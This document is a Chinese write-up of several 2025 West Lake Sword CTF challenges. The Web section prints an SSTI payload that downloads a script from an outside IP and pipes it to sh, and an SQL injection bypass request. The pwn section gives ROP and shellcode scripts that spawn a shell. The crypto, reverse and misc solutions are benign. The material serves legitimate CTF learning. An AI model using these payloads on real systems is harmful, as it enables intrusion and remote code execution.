2025西湖论剑

Web

Rank-l

网上找之前ciscn ccb的poc就能打

phone_number={{url({%set glo='_'+'_'+'globals'+'_'+'_'%}{%set bui='_'+'_'+'builtins'+'_'+'_'%}{%set imp='_'+'_'+'imp'+'ort'+'_'+'_'%}{%set zx='o'+'s'%}{{cycler.next[glo][bui][imp](zx)['pop'+'en']('(curl '+cycler.next[glo][bui]['chr'](45)+'fsSL '+cycler.next[glo][bui]['chr'](45)+'m180 http:'+cycler.next[glo][bui]['chr'](47)+''+cycler.next[glo][bui]['chr'](47)+'8.140.232.67:8084'+cycler.next[glo][bui]['chr'](47)+'slt||wget '+cycler.next[glo][bui]['chr'](45)+'T180 '+cycler.next[glo][bui]['chr'](45)+'q http:'+cycler.next[glo][bui]['chr'](47)+''+cycler.next[glo][bui]['chr'](47)+'8.140.232.67:8084'+cycler.next[glo][bui]['chr'](47)+'slt)|sh')['read']()}})}}

记得要把-和/用chr饶过一下

flag root读

查suid

公网开vshell把shell弹出来

跟这个博客走一遍suid提权，直接读/flagf149

https://mikokuma.github.io/posts/1ca7db7c/index.html

sqli or not

url编码可以绕过第一个检测

使用$`当作'打绕过第二个

最终payload

GET /?info={{url({"username":"admin$` or 1=1-- ","password":"aa$`"})}} HTTP/1.1
Host: 139.155.126.78:25369
Sec-Fetch-Mode: navigate
sec-ch-ua-mobile: ?0
Accept-Encoding: gzip, deflate, br, zstd
sec-ch-ua-platform: "macOS"
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.9

REVERSE

BitDance

首先输入任意内容，提示长度错误，因此先进行枚举爆破字符串长度，当字符长度为96时得到不同的输出，因此确定flag字符长度为96位。

然后观察程序输出，默认颜色为绿色，第一行有1个字符为蓝色，后续行每行有一个字符为蓝色。继续观察发现标红的位置为每行中唯一可能变化的值。

后续继续试验发现，输入的字符首先会被转换成二进制序列，然后二进制序列每一行可能变化的位置与输入无关，是程序内的固定逻辑。我们称输入为I，原始序列空间为A（I属于A），经过offset映射后的空间为B，映射变化为T，逆变换为S。则有：

O = S(Rotate(T(I), 1))

程序中给出输出反求输入：

I = S(Rotate(T(O), -1))

执行截图：

脚本如下：

from pwn import *
import re
import pickle

if os.path.exists('output.bin'):
    with open('output.bin', 'rb') as f:
        output = pickle.load(f)
else:
    # 连接到指定的地址和端口
    p = remote('139.155.126.78', 16699)

    # 接收欢迎信息
    welcome_msg = p.recvuntil('Welcome to dance: ')

    # 发送 96 个 0xFF
    # p.sendline(b'\xFF' * 95 + b'\xFC')
    # 将10序列转换成bytes
    # b = '000011000110000101001000001110100000000101000100110100101000110111001010000010111011100000000010101100011100010110001000011001000110011101101001001001100110100100010001110001110100011100011111110111001011011100001110000110100101000011000011010101110000110101110101101011110000000101011000000101001010001000001010111111111100100010001100000001011101100101000000111101101010001100010110001000010101101100111101111111110101100111000010111110110101010010000011100000011011010010001110011010100101000000011100000010001010010110111000111001000100110101000001101000110001001000000000111100001100100000001010100101101010101001111001010010001111000101011011001001001101000010011101011101011011011110101000110110101000011001000100001101110000101110110000010001000010010001001100'
    b = ['1'] * (96 * 8)
    b[767] = '0'
    b[143] = '0'
    b[722] = '0'
    b[387] = '0'
    b = ''.join(b)
    b = [b[i:i + 8] for i in range(0, len(b), 8)]
    b = [int(i, 2) for i in b]
    p.sendline(bytes(b))

    # 接收 'Start from 0'
    start_from_0 = p.recvuntil('Start from 0\n')

    # 打印所有输出
    output = p.recvall()
    output = output.split(b'\n')
    output, other = output[:769], output[769:]

    # 左删除 '\x1b[0;32m', 右删除 '\x1b[0m'
    output = [line[7:-4] for line in output]

    print(other)

    # 保存输出
    with open('output.bin', 'wb') as f:
        pickle.dump(output, f)

# regex 找到 \x1b[0m\x1b[0;34m0\x1b[0m\x1b[0;32m
pattern = re.compile(rb'\x1b\[0m\x1b\[0;\d+m([01])\x1b\[0m\x1b\[0;32m')

simple_output = []
pos = []
for line in output:
    # find pattern in line
    match = pattern.search(line)
    assert match
    pos.append(match.start())
    # get prefix and suffix, then combine them
    prefix = line[:match.start()]
    suffix = line[match.end():]
    simple_output.append(prefix + match.group(1) + suffix)

# 打印简化后的输出
for i in range(len(simple_output)):
    curr_pos = pos[i]
    curr_output = simple_output[i]
    curr_output_with_color = output[i].decode()

    flip = False
    if i != 0:
        prev_bit = simple_output[i - 1][curr_pos]
        curr_bit = simple_output[i][curr_pos]
        if curr_bit != prev_bit:
            flip = True

    flip_str = 'flip' if flip else '    '

    print(f'{curr_pos:3}, {flip_str}: {curr_output_with_color}')

# # map b by pos
# b = ['1'] * (96 * 8)
# b[767] = '0'
# b[143] = '0'
# b[722] = '0'
# b[387] = '0'
#
# b_after_map = ['_'] * (96 * 8)
# for i in range(96 * 8):
#     b_after_map[i] = b[pos[i+1]]
#
# b_after_map = ''.join(b_after_map)
# print(b_after_map)
#
# b_handle = ['_'] * (96 * 8)
#
# pos_real = pos[1:]
# simple_output_real = simple_output[1:]
# for i in range(len(simple_output_real)):
#     curr_pos = pos_real[i]
#     curr_output = simple_output_real[i].decode()[curr_pos]
#     b_handle[i] = curr_output
#
# b_handle = ''.join(b_handle)
# print(b_handle)
#


def map_b(b):
    b_after_map = ['_'] * (96 * 8)
    for i in range(96 * 8):
        b_after_map[i] = b[pos[i + 1]]
    return b_after_map

def unmap_b(b):
    b_after_unmap = ['_'] * (96 * 8)
    for i in range(96 * 8):
        b_after_unmap[pos[i + 1]] = b[i]
    return b_after_unmap

def split_b(b_str):
    return list(b_str)

def merge_b(b_list):
    return ''.join(b_list)

def rotate_b(b_list, n):
    # n may > 0 or < 0
    b_list_new = b_list[:]
    n = n % len(b_list_new)
    return b_list_new[n:] + b_list_new[:n]

def flip_b(b_list):
    b_list_new = b_list[:]
    for i in range(len(b_list) - 1):
        if b_list[i] != b_list[i + 1]:
            b_list_new[i + 1] = '1' if b_list[i + 1] == '0' else '0'
    return b_list_new


# b = ['1'] * (96 * 8)
# b[767] = '0'
# b[143] = '0'
# b[722] = '0'
# b[387] = '0'

# b = list('011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001011000010110000101100001')
#
# b_dup = b[:]
#
# b = split_b(b)
# b = map_b(b)
# b = ['0'] + b
# # print(merge_b(b))
# # b = flip_b(b)
# b = rotate_b(b, -1)
# # print(merge_b(b))
# b = b[1:]
# b = unmap_b(b)
# b = merge_b(b)
# print(b)
#
# # revert
# b = split_b(b)
# b = map_b(b)
# b = ['0'] + b
# b = rotate_b(b, 1)
# b = b[1:]
# b = unmap_b(b)
# b = merge_b(b)
# print('compare')
# print(merge_b(b_dup))
# print(b)
#

b = '000011000110000101001000001110100000000101000100110100101000110111001010000010111011100000000010101100011100010110001000011001000110011101101001001001100110100100010001110001110100011100011111110111001011011100001110000110100101000011000011010101110000110101110101101011110000000101011000000101001010001000001010111111111100100010001100000001011101100101000000111101101010001100010110001000010101101100111101111111110101100111000010111110110101010010000011100000011011010010001110011010100101000000011100000010001010010110111000111001000100110101000001101000110001001000000000111100001100100000001010100101101010101001111001010010001111000101011011001001001101000010011101011101011011011110101000110110101000011001000100001101110000101110110000010001000010010001001100'
b = split_b(b)
b = map_b(b)
b = ['0'] + b
print('temp1:', merge_b(b))
b = rotate_b(b, 1)
print('temp2:', merge_b(b))
b = b[1:]
b = unmap_b(b)
b = merge_b(b)
print(b)


# b = '000011000110000101001000001110100000000101000100110100101000110111001010000010111011100000000010101100011100010110001000011001000110011101101001001001100110100100010001110001110100011100011111110111001011011100001110000110100101000011000011010101110000110101110101101011110000000101011000000101001010001000001010111111111100100010001100000001011101100101000000111101101010001100010110001000010101101100111101111111110101100111000010111110110101010010000011100000011011010010001110011010100101000000011100000010001010010110111000111001000100110101000001101000110001001000000000111100001100100000001010100101101010101001111001010010001111000101011011001001001101000010011101011101011011011110101000110110101000011001000100001101110000101110110000010001000010010001001100'

b = [b[i:i + 8] for i in range(0, len(b), 8)]
b = [int(i, 2) for i in b]
b = bytes(b)
print(b)

Crypto

MartixRSA

import random
import string
from Crypto.Util.number import *
from secret import flag
ext_len = 9*23 - len(flag)
flag += ''.join(random.choice(string.printable) for _ in range(ext_len))
def my_rsa_encrypt():
    p = getPrime(512)
    q = getPrime(512)
    n = p * q
    data = []
    for i in range(9):
        data.append(bytes_to_long(flag[23*i:23*(i+1)].encode()))
    M = Matrix(Zmod(n), [data[i:i+3] for i in range(0, len(data), 3)])
    e = 65537
    C = M**e
    print("p =", p >> 100)
    print("n =", n)
    return C
C = my_rsa_encrypt()
print("C =", C)
'''
p = 9707529668721508094878754383636813058761407528950189013789315732447048631740849315894253576415843631107370002912949379757275
n = 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009
C = [130700952989014311434434028098810412089294728270156705618326733322297465714495704072159530618655340096705383710304658044991149662060657745933090473082775425812641300964472543605460360640675949447837208449794830578184968528547366608180085787382376536622136035364815331037493098283462540849880674541138443271941  71108771421281691064141020659106224750236412635914570166893031318860027728093402453305986361330527563506168063047627979831630830003190075818824767924892107148560048725155587353683119195901991465464478196049173060097561821877061015587704803006499153902855903286456023726638247758665778434728734461065079337757  67999998657112350704927993584783146575182096185020115836188544590466205688442741039622382576899587857972463337900200038021257164640987281308471100297698062626107380871262596623736773815445544153508352926374272336154553916204320257697068627063236060520725376727528604938949588845448940836430120015498687885615]
[ 23893343854815011808020457237095285782125931083991537368666368653089096539223297567339111502968295914745423286070638369517207554770793304994639155083818859208362057394004419565231389473766857235749279110546079776040193183912062870294579472815588333047561915280189529367474392709554971446978468118280633281993   9711323829269829751519177755915164402658693668631868499383945203627197171508441332211907278473276713066275283973856513580205808517918096017699122954464305556795300874005627001464297760413897074044080665941802588680926430030715299713241442313300920463145903399054123967914968894345491958980945927764454159601  44904507975955275578858125671789564568591470104141872573541481508697254621798834910263012676346204850278744732796211742615531019931085695420000582627144871996018850098958417750918177991375489106531511894991744745328626887250694950153424439172667977623425955725695498585224383607063387876414273539268016177401]
[ 67805732998935098446255672500407441801838056284635701147853683333480924477835278030145327818330916280792499177503535618310624546400536573924729837478349680007368781306805363621196573313903080315513952415535369016620873765493531188596985587834408434835281527678166509365418905214174034794683785063802543354572  13486048723056269216825615499052563411132892702727634833280269923882908676944418624902325737619945647093190397919828623788245644333036340084254490542292357044974139884304715033710988658109160936809398722070125690919829906642273377982021120160702344103998315875166038849942426382506293976662337161520494820727  95932690738697024519546289135992512776877884741458439242887603021792409575448192508456813215486904392440772808083658410285088451086298418303987628634150431725794904656250453314950126433260613949819432633322599879072805834951478466009343397728711205498602927752917834774516505262381463414617797291857077444676]

'''

根据题目信息和形式，可以直接看出来是需要去做一个矩阵快速幂+已知p的高位求解

先求解pq，已知高位那就直接coppersmith。

n = 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009
p4 =  9707529668721508094878754383636813058761407528950189013789315732447048631740849315894253576415843631107370002912949379757275
pbits = 512
kbits = pbits - p4.nbits()
print(p4.nbits())
p4 = p4 << kbits
PR.<x> = PolynomialRing(Zmod(n))
f = x + p4
roots = f.small_roots(X=2^kbits, beta=0.4)
if roots:        
    p = p4 + int(roots[0])
    q = n//p
    print(f'n: {n}')
    print(f'p: {p}')
    print(f'q: {q}')
'''
n: 132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009
p: 12305755811288164655681709252717258015229295989302934566212712319314835335461946241491177972870130171728224502716603340551354171940107285908105124549960063
q: 10750967246621849802090386055921679114516122704252330881722100331526757637044067492444912824266860574267360247681890637480406758188129451052986858429875143
'''

得知p和q的值之后，我们就可以利用矩阵上的欧拉函数来求解对应的d的值了，矩阵上的phi的求解方法可以在论文上搜到，其实在2024H&NCTF就遇到过类似的题。具体如下：

from gmpy2 import *
from Crypto.Util.number import *
import numpy
p=12305755811288164655681709252717258015229295989302934566212712319314835335461946241491177972870130171728224502716603340551354171940107285908105124549960063
q=10750967246621849802090386055921679114516122704252330881722100331526757637044067492444912824266860574267360247681890637480406758188129451052986858429875143
n=132298777672085547096511087266255066285502135020124093900452138262993155381766816424955849796168059204379325075568094431259877923353664926875986223020472585645919414821322880213299188157427622804140996898685564075484754918339670099806186873974594139182324884620018780943630196754736972805036038798946726414009
q=n//p
e=65537
phi=(p**2-1)*(p**2-p)*(q**2-1)*(q**2-q)
d=invert(e,phi)
C = [(130700952989014311434434028098810412089294728270156705618326733322297465714495704072159530618655340096705383710304658044991149662060657745933090473082775425812641300964472543605460360640675949447837208449794830578184968528547366608180085787382376536622136035364815331037493098283462540849880674541138443271941,71108771421281691064141020659106224750236412635914570166893031318860027728093402453305986361330527563506168063047627979831630830003190075818824767924892107148560048725155587353683119195901991465464478196049173060097561821877061015587704803006499153902855903286456023726638247758665778434728734461065079337757,67999998657112350704927993584783146575182096185020115836188544590466205688442741039622382576899587857972463337900200038021257164640987281308471100297698062626107380871262596623736773815445544153508352926374272336154553916204320257697068627063236060520725376727528604938949588845448940836430120015498687885615),(23893343854815011808020457237095285782125931083991537368666368653089096539223297567339111502968295914745423286070638369517207554770793304994639155083818859208362057394004419565231389473766857235749279110546079776040193183912062870294579472815588333047561915280189529367474392709554971446978468118280633281993,9711323829269829751519177755915164402658693668631868499383945203627197171508441332211907278473276713066275283973856513580205808517918096017699122954464305556795300874005627001464297760413897074044080665941802588680926430030715299713241442313300920463145903399054123967914968894345491958980945927764454159601,44904507975955275578858125671789564568591470104141872573541481508697254621798834910263012676346204850278744732796211742615531019931085695420000582627144871996018850098958417750918177991375489106531511894991744745328626887250694950153424439172667977623425955725695498585224383607063387876414273539268016177401),(67805732998935098446255672500407441801838056284635701147853683333480924477835278030145327818330916280792499177503535618310624546400536573924729837478349680007368781306805363621196573313903080315513952415535369016620873765493531188596985587834408434835281527678166509365418905214174034794683785063802543354572,13486048723056269216825615499052563411132892702727634833280269923882908676944418624902325737619945647093190397919828623788245644333036340084254490542292357044974139884304715033710988658109160936809398722070125690919829906642273377982021120160702344103998315875166038849942426382506293976662337161520494820727,95932690738697024519546289135992512776877884741458439242887603021792409575448192508456813215486904392440772808083658410285088451086298418303987628634150431725794904656250453314950126433260613949819432633322599879072805834951478466009343397728711205498602927752917834774516505262381463414617797291857077444676)]
print(d)
#43047629616720251859920881165918075023893933573825994519997852119693144034068228665675671008862068761689715575445863640329185530092254447033928598712851124933241259796000409454197098998799078885998056075500976415419186412399189184258784327330927609649434122305185189759743259787356570331002461440733304204342679095128737964168575795695943494599749806682478073567726561293885643247380288743798673732739109783483741538869058700456560293887763294510183730649166561156999855271107039762823109162450450948873519089591956760678722334804695337058632832722333717031908734519718095108861846032363515360975287686310685125011768433759743169949589954960109168003535788965458199549552102384437401599362854039593164761770413470916704699518414671776915866253494811160263070661525551825028432063886591059208936847333549443116179443061702501174393173108634281296467878611053210142532485402964658881743677593408270250687616341096196040338988333205100490703477191756842960478575393797412553786998150700948989806787001465881554867817322042204140650969096886474708640327780777812748503294416087248565587329831724663810705103426406635344978879191125281349704216611638879400671856857369494791947153176208756628137723497867840017302010032797105960559820801

求出d之后，我们再矩阵快速幂算C^d次即可得到flag的各部分

import numpy as np
def mod_matrix_multiply(A, B, n):
    # 在模 n 的有限域上计算矩阵乘法
    C = np.dot(A, B) % n
    return C

def mod_matrix_power(A, power, n):
    # 计算矩阵 A 的幂
    result = np.eye(len(A), dtype=int)  # 创建单位矩阵
    while power > 0:
        if power % 2 == 1:
            result = mod_matrix_multiply(result, A, n)
        A = mod_matrix_multiply(A, A, n)
        power //= 2
    return result
C = [(130700952989014311434434028098810412089294728270156705618326733322297465714495704072159530618655340096705383710304658044991149662060657745933090473082775425812641300964472543605460360640675949447837208449794830578184968528547366608180085787382376536622136035364815331037493098283462540849880674541138443271941,71108771421281691064141020659106224750236412635914570166893031318860027728093402453305986361330527563506168063047627979831630830003190075818824767924892107148560048725155587353683119195901991465464478196049173060097561821877061015587704803006499153902855903286456023726638247758665778434728734461065079337757,67999998657112350704927993584783146575182096185020115836188544590466205688442741039622382576899587857972463337900200038021257164640987281308471100297698062626107380871262596623736773815445544153508352926374272336154553916204320257697068627063236060520725376727528604938949588845448940836430120015498687885615),(23893343854815011808020457237095285782125931083991537368666368653089096539223297567339111502968295914745423286070638369517207554770793304994639155083818859208362057394004419565231389473766857235749279110546079776040193183912062870294579472815588333047561915280189529367474392709554971446978468118280633281993,9711323829269829751519177755915164402658693668631868499383945203627197171508441332211907278473276713066275283973856513580205808517918096017699122954464305556795300874005627001464297760413897074044080665941802588680926430030715299713241442313300920463145903399054123967914968894345491958980945927764454159601,44904507975955275578858125671789564568591470104141872573541481508697254621798834910263012676346204850278744732796211742615531019931085695420000582627144871996018850098958417750918177991375489106531511894991744745328626887250694950153424439172667977623425955725695498585224383607063387876414273539268016177401),(67805732998935098446255672500407441801838056284635701147853683333480924477835278030145327818330916280792499177503535618310624546400536573924729837478349680007368781306805363621196573313903080315513952415535369016620873765493531188596985587834408434835281527678166509365418905214174034794683785063802543354572,13486048723056269216825615499052563411132892702727634833280269923882908676944418624902325737619945647093190397919828623788245644333036340084254490542292357044974139884304715033710988658109160936809398722070125690919829906642273377982021120160702344103998315875166038849942426382506293976662337161520494820727,95932690738697024519546289135992512776877884741458439242887603021792409575448192508456813215486904392440772808083658410285088451086298418303987628634150431725794904656250453314950126433260613949819432633322599879072805834951478466009343397728711205498602927752917834774516505262381463414617797291857077444676)]

d=43047629616720251859920881165918075023893933573825994519997852119693144034068228665675671008862068761689715575445863640329185530092254447033928598712851124933241259796000409454197098998799078885998056075500976415419186412399189184258784327330927609649434122305185189759743259787356570331002461440733304204342679095128737964168575795695943494599749806682478073567726561293885643247380288743798673732739109783483741538869058700456560293887763294510183730649166561156999855271107039762823109162450450948873519089591956760678722334804695337058632832722333717031908734519718095108861846032363515360975287686310685125011768433759743169949589954960109168003535788965458199549552102384437401599362854039593164761770413470916704699518414671776915866253494811160263070661525551825028432063886591059208936847333549443116179443061702501174393173108634281296467878611053210142532485402964658881743677593408270250687616341096196040338988333205100490703477191756842960478575393797412553786998150700948989806787001465881554867817322042204140650969096886474708640327780777812748503294416087248565587329831724663810705103426406635344978879191125281349704216611638879400671856857369494791947153176208756628137723497867840017302010032797105960559820801
print(mod_matrix_power(C,d,n))
'''

[[6537547124942896363556910284537979082270724861730448998#flag1
  4922321730290670654923300376398270986600388494493121377#flag2
  7875050823366674760074264670738469846743038549320754022]
 [11881437197497587270801024560701872641095800502149666903
  7108052949162680427522366598986786385855392560476464945
  10473947150905785882178785731710621841892274865355840321]
 [9617091766406860640816031598215594338237784858167441764
  3097622505046341281563803128600372235582304064924953929
  5119872974228642605667436257655922430927914019627757406]]
'''

将前面三部分转字符后拼接起来即可

from Crypto.Util.number import *
a1=6537547124942896363556910284537979082270724861730448998
a2=4922321730290670654923300376398270986600388494493121377
a3=7875050823366674760074264670738469846743038549320754022

print(long_to_bytes(a1))
print(long_to_bytes(a2))
print(long_to_bytes(a3))

得到flag

DASCTF{48ccbfd88061d7ff3d5325148ec55d11}

Misc

糟糕的磁盘

题目给我们了几个img镜像

首先，我们将这些文件挂载在disk-drill下

发现有两个文件，我们将其恢复，发现得到了一个key.png和一个secret文件

我们打开key.png来看一看，发现是一张照片

然后我们使用VeraCrypt工具，将我们的secret挂载在加密卷上，使用我们的key.png作为密钥，即可解密

发现我们成功将文件挂载在了H盘上。打开之后得到一个flag.txt文件

打开得到flag

DASCTF{R41D_4ND_D15K_M4573R}

DS

DS1

error log有大量16进制，全部提取出来，并且分析对应的eval代码是文件的上传

两处十六进制分别是一个图片和一个压缩包，压缩包里面有密码

图片是一个盲水印

我们使用WaterMark工具直接一把梭，选择盲水印提取，获得压缩包对应的密码pass：dataPersonPass123987

得到密码后，解压对应的文件夹，可以得到一个csv文件，里面存放着对应的sfz和手机号，我们只需要定位到张三的信息就可以了

得到flag

DASCTF{30601319731003117X_79159498824}

DS2

使用下面代码读取data.pcapng中的userid和data数据：

import pyshark
import json
import csv

# 读取 pcapng 文件
cap = pyshark.FileCapture('data.pcapng', display_filter='http.request', tshark_path="E:/CTFWeb/Wireshark/tshark.exe")

data = []

# 遍历每一个 HTTP 请求包
for packet in cap:
    # 判断是否是 HTTP POST 请求
    if 'HTTP' in packet:
        if packet.http.request_method == 'POST':
            
            username = ""
            name = ""
            idcard = ""
            phone = ""
            
            # 输出请求的 URL 和查询参数
            if hasattr(packet.http, 'host') and hasattr(packet.http, 'request_uri_query_parameter'):
                username = packet.http.request_uri_query_parameter
            
            # 输出 POST 数据
            if hasattr(packet, 'http') and hasattr(packet.http, 'file_data'):
                post_data = packet.http.file_data
                d = json.loads(post_data)
                name = d["name"]
                idcard = d["idcard"]
                phone = d["phone"]
            else:
                print("No POST data found.")
            
            data.append({"username": username, "name": name, "idcard": idcard, "phone": phone})
            
            print('-'*50)
                        
csv_file_path = 'output.csv'
# 获取字典的字段名（即 CSV 文件的列名）
fieldnames = data[0].keys()

# 打开文件并写入数据
with open(csv_file_path, mode='w', newline='', encoding='utf-8') as file:
    writer = csv.DictWriter(file, fieldnames=fieldnames)

    # 写入表头
    writer.writeheader()

    # 写入数据
    writer.writerows(data)

print(f"Data has been written to {csv_file_path}")

读取完之后使用下面验证脚本对每个用户数据进行验证：

import csv
import os
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import dsa
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.backends import default_backend
from Crypto.PublicKey import DSA
from Crypto.Signature import DSS
from Crypto.Hash import SHA256
import base64

def load_public_key(user_id):
    """
    Load the public key from a PEM file based on the user_id.
    The public key file is named in the format `public-XXXX.pem`, where XXXX is the user_id padded to 4 digits.
    """
    filename = f'public/public-{user_id:04d}.pem'
    with open(filename, 'rb') as key_file:
        # public_key = serialization.load_pem_public_key(
        #     key_file.read(),
        #     backend=default_backend()
        # )
        public_key = key_file.read()
    return public_key

def verify_signature(data, signature, user_id):
    """
    Verify the DSA signature using the SHA256 hash of the data and the corresponding public key.
    """
    public_key_pem = load_public_key(user_id)
    public_key = DSA.import_key(public_key_pem)
    
    # Verify the signature using the public key
    for key, value in data.items():
        message = SHA256.new(value.encode('utf-8'))
        verifier = DSS.new(public_key, 'fips-186-3')
        signature_decoded = base64.b64decode(signature[key])
        
        try:
            verifier.verify(message, signature_decoded)
        except ValueError:
            # print("Signature is invalid.")
            return False
    
    # print(f"Signature is valid.")
    return True

signatures = {}
count = 1

with open('data-sign.csv', mode='r') as file:
    reader = csv.reader(file)
    next(reader)
    for row in reader:
        if len(row) != 4:
            continue  # Skip invalid rows

        username, name_signature, idcard_signature, phone_signature = row
        username = int(username)
        
        signatures[username] = {"name": name_signature, "idcard": idcard_signature, "phone": phone_signature}

        # signature = bytes.fromhex(signature)  # Assuming signature is stored in hex format
        
        # Verify the signature for the current user
        # verify_signature(data, signature, user_id)

invalid_data = []
duplicated = set()

with open('output.csv', mode='r', encoding='utf-8') as file:
    reader = csv.reader(file)
    next(reader)
    for row in reader:
        
        print(count)
        count += 1
        
        dp = ''.join(row)
        if dp in duplicated:
            continue
        else:
            duplicated.add(dp)
        
        if len(row) != 4:
            continue  # Skip invalid rows

        username, name, idcard, phone = row
        username = int(username)
        
        data = {"name": name, "idcard": idcard, "phone": phone}
        # print(data, signatures[username])
        is_valid = verify_signature(data, signatures[username], username)
        if not is_valid:
            invalid_data.append({
                "userid": username, 
                "name": name, 
                "idcard": idcard, 
                "phone": phone
            })
        # break

csv_file_path = 'data.csv'
fieldnames = invalid_data[0].keys()
with open(csv_file_path, mode='w', newline='', encoding='utf-8') as file:
    writer = csv.DictWriter(file, fieldnames=fieldnames)
    writer.writeheader()
    writer.writerows(invalid_data)

print(f"Data has been written to {csv_file_path}")

最后得到data.csv上传到平台即可。

IOT

blink

shift f12字符串里面翻一翻可以找到这么一串字符串

后面接着morse编码的ABCD，提交发现正确rtosandmorseisveryeasyhahhaha

sharkp

打开附件，看到流量文件、bin文件和readme，里面需要一个接口，一个ip地址。先看流量文件分析一下。

最开始，先看的http，发现没什么有用的信息。

翻了一下没看出什么端倪。然后决定去文件里看看有没有什么信息，先通过unsquashfs去提取文件系统。

然后翻了一下文件系统，看到这里有个watch-dog，进去看看

看门狗文件大概就是系统出现问题，看门狗会自动重启，这里可以去找找有没有对应的文件。etc下的文件没找到，但是找到了alphapd文件。

后续又去翻了一下流量文件，特意查看了一下post方法。发现其中

其中setSystemAdmin非常可疑，看到里面的内容后觉得更可疑了。这个AdminID更是可疑。

也翻了一下前面的setConfigUpload，看到里面很多的a，基本确定了这里就是攻击的流量，这里是pwn在打的过程。

我们进入到alphapd里，搜索setSystemAdmin

在这里可以看到利用点，基本可以确定利用的接口就在这里。这里利用字符串拼接，拼出来的结果是：

于是去找了一下telnet的流量，因为是单向流量。所以猜测ip是藏在报文里的

telnet流量里的内容如下：

但是尝试了setSystemAdmin_2.65.87.199，发现不行。

在telnet数据流中发现了一个http的请求，同时这个端口也是8000.比较奇怪，然后打开报文看了一下，这里是一个elf文件。把这串数据写入文件，分析一下其中的逻辑

发现也看不太懂，丢给gpt去看。发现这里有存ip，然后解析了一下。发现161.88.195.115不行。

又猜测是小端序，变成小端序后提交，flag正确。即最后的flag是setSystemAdmin_115.195.88.161

pwn

Vpwn

一个简易的C++VECTOR实现

分析一下程序很容易知道，其存储的是int值，并且存储在栈上的v8里面。

随便点一个函数进去，可以观察到+24的地方存储vector元素数量，是个8字节数据，正好是v8的第6个元素，因此vector的第6，7个元素的值恰好覆盖v8，若取得很大那么就可以读取和覆盖栈上的任意数据

可以通过此函数读取栈上足够多的数据：

其他的就是格式的处理了：

py如下：

from pwn import*
#io = process("./Vpwn")
io = remote("139.155.126.78",22675)
elf = ELF("./libc.so.6")
context.log_level = "debug"
context.terminal = ['tmux','splitw','-h']


import re

def extract_values(text):
    text = text.decode('utf-8')
    match = re.search(r'StackVector contents:\s*(.*)', text)
    if match:
        values = [int(value) for value in match.group(1).split()]
        return values
    return []

def dbg(cmd=""):
    gdb.attach(io,cmd)
    pause()

def choice(index):
    io.sendlineafter(b"Enter your choice: ",str(index).encode("utf-8"))
def push(value):
    choice(2)
    io.sendlineafter(b"Enter the value to push: ",str(value).encode("utf-8"))
def pop():
    choice(3)
def show():
    choice(4)
    return  extract_values(io.recvline())
def edit(index,value):
    choice(1)
    io.sendlineafter(b"Enter the index to edit (0-based): ",str(index).encode("utf-8"))
    io.sendlineafter(b"Enter the new value: ",str(value).encode("utf-8")
)
def exploit(injectindex,length):
    for i in range(length):
        edit(injectindex+i,payloadarray[i])
        sleep(0.5)
  

for i in range(7):
    push(0x300)
test = show()
hex_values = [hex(value if value >= 0 else (1 << 32) + value) for value in test]
with open("hex_values.txt", "w") as f:
    for value in hex_values:
        f.write(value + "\n")
# print(hex_values)

valuelist = show()

pause()

__libc_start_maina_add = (valuelist[59]<<32|valuelist[58])
libcbase = 0x7cb250a00000 - 0x7cb250a29e40 + __libc_start_maina_add
rdi = 0x000000000002a3e5+libcbase
rsi = 0x000000000002be51+libcbase
rbcdx = 0x0000000000108b03+libcbase
execve = elf.symbols["execve"]+libcbase
binsh = 0x1D8678+libcbase
payloadarray = [rdi&0xffffffff,(rdi>>32),
                binsh&0xffffffff,(binsh>>32),
                rsi&0xffffffff,(rsi>>32),(0x0),(0x0),
                rbcdx&0xffffffff,(rbcdx>>32),(0),(0),(0),(0),(0),(0),
                execve&0xffffffff,(execve>>32)]


#edit(58,rdi&0xffffffff)
#edit(59,(rdi>>32))
exploit(18,len(payloadarray))
# dbg('''
# b *$rebase(0x17D0)
# ''')
choice(5)
pause()
io.interactive()  

HEAVEN DOOR

打开程序看一眼，是一个多进程，父进程会执行if内，子进程会执行else，else可以不用去关系，仅仅是输出一些东西

可以看见mmap在0x100000映射了一段内存，然后然我们往里面写内容，然后内容会被当做函数体来执行。

因此可以知道此题写shellcode即可。但是开了沙箱，观察一些禁用了那些系统调用：

但是此程序的沙箱配置存在问题，可以直接getshell即可：

from pwn import *
context.arch='amd64'
io = process("./vuln")

io.recvuntil("MADE IN HEAVEN !!!!!!!!!!!!!!!!")
bin = asm(shellcraft.sh())
#gdb.attach(io)
#pause()
io.sendline(bin)
#pause()
#print(io.recv())
#print(io.recv())
io.interactive()